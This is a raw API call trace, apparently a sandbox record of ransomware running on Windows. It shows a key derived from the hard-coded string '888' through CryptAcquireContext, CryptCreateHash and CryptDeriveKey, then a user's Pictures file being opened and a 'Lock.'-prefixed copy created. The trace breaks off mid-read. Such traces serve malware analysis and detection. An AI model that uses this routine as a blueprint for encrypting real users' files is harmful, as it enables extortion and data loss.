[0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0210.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.174] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0210.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0210.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0210.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.174] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0210.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0210.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.175] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0210.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0210.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0210.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0210.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0210.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.175] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0210.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0210.175] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.175] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.175] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0210.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0210.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0210.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f70c0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0210.176] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c110) returned 1 [0210.176] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0210.177] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0210.177] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.177] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.178] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0210.178] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0210.178] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.178] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.178] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.178] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.178] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.178] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.178] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.178] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.178] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.178] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.178] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0210.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab170, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0210.178] CryptCreateHash (in: hProv=0xa7c110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0210.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bd8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.178] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0210.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.179] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.179] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0210.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab1a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0210.179] CryptHashData (hHash=0x9e1db8, pbData=0x2a71d98, dwDataLen=0x3, dwFlags=0x1) returned 1 [0210.179] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.179] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.179] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.179] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0210.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab278, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0210.179] CryptDeriveKey (in: hProv=0xa7c110, Algid=0x6601, hBaseData=0x9e1db8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2138) returned 1 [0210.179] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.179] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0210.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f71e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0210.180] CryptDestroyHash (hHash=0x9e1db8) returned 1 [0210.180] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/G_BhwPRnGbbQ-dfc.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\g_bhwprngbbq-dfc.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0210.181] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.181] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0210.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0210.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.182] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0210.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0210.182] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0210.182] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0210.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a74808 [0210.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.184] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0210.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74808 | out: hHeap=0x2af0000) returned 1 [0210.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0210.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a938 [0210.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0210.185] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.G_BhwPRnGbbQ-dfc.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.g_bhwprngbbq-dfc.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0210.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ea0 [0210.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.186] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0210.186] TranslateMessage (lpMsg=0x8cf708) returned 0 [0210.186] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0210.186] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0210.186] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0210.186] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0210.186] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0210.186] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0210.186] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0210.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0210.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0210.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0210.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0210.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0210.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50ee020 [0210.190] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0210.190] ReadFile (in: hFile=0x520, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, 